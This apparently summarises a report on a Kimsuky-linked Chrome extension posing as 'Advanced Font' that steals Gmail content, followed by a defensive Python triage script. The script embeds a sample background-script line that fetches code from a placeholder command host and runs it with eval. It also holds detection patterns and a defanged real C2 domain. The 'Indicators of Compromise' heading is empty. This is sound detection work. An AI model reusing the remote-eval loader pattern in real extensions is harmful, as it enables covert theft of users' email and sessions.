Malware via a Google Chrome add-on created by Kimsuky (2023.3.20)

2023-05-16 Sakai Malicious code through Google Chrome add-on created by Kimsuky (2023.3.20)

https://wezard4u.tistory.com/6444


The Wezard4u analysis describes a Kimsuky-linked malicious Google Chrome extension used to steal email content from Gmail and potentially other Chromium-based browsers. The extension masquerades as “AF” or “Advanced Font,” requests broad permissions for tabs, navigation, cookies, and HTTP/HTTPS sites, and loads a background script that repeatedly contacts gonamod[.]com/sanghyon/index.php. The script can receive and execute remote JavaScript with eval, monitor browser events, handle messages, and includes helper routines for email validation, parameter extraction, and encoding. The report frames the activity as part of Kimsuky’s broader targeting of diplomats, journalists, government personnel, professors, politicians, and North Korea-related organizations.
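As an added triage example (not code from the original report or from Wezard4u), the following Python checks an unpacked Chrome extension's manifest and background script for the combination the summary describes: broad host access, tab/cookie/navigation permissions, and a polling loop that hands remotely fetched code to eval. The manifest, the script fragment, the HIGH_RISK_PERMISSIONS set and the placeholder URL are constructed assumptions, not the actual artifact.

```python
import json
import re

# Permissions that, combined with broad host access, let an extension read
# page content, session cookies and navigation history (assumed set,
# modelled on the permissions the report attributes to "Advanced Font").
HIGH_RISK_PERMISSIONS = {"tabs", "cookies", "webNavigation", "webRequest"}
BROAD_HOST_PATTERNS = {"<all_urls>", "http://*/*", "https://*/*", "*://*/*"}

# Constructed sample manifest (v2 puts host patterns in "permissions").
SAMPLE_MANIFEST = json.dumps({
    "name": "Advanced Font",
    "manifest_version": 2,
    "permissions": ["tabs", "webNavigation", "cookies", "http://*/*", "https://*/*"],
    "background": {"scripts": ["background.js"]},
})

# Constructed background script fragment: polls a placeholder URL and evals the reply.
SAMPLE_BACKGROUND_JS = """
setInterval(function () {
  fetch("https://c2.example.invalid/index.php").then(r => r.text()).then(code => eval(code));
}, 60000);
"""

REMOTE_EVAL_RE = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")
POLL_RE = re.compile(r"\bsetInterval\s*\(|\bsetTimeout\s*\(")

def assess_manifest(manifest_json):
    """Return (sorted high-risk permissions, sorted broad host patterns)."""
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
    return sorted(perms & HIGH_RISK_PERMISSIONS), sorted(perms & BROAD_HOST_PATTERNS)

def assess_background_script(js_source):
    """Flag dynamic code execution and timer-driven polling in a background script."""
    return {
        "dynamic_code_exec": bool(REMOTE_EVAL_RE.search(js_source)),
        "polling_loop": bool(POLL_RE.search(js_source)),
    }

def triage(manifest_json, js_source):
    flags, broad = assess_manifest(manifest_json)
    script = assess_background_script(js_source)
    # Broad hosts + tab/cookie access + remote eval is the combination that
    # turns a "font" add-on into a mail-reading backdoor; each alone is common.
    suspicious = bool(flags) and bool(broad) and script["dynamic_code_exec"]
    return {"permission_flags": flags, "broad_hosts": broad, **script, "suspicious": suspicious}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_BACKGROUND_JS), indent=2))
```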

Indicators of Compromise

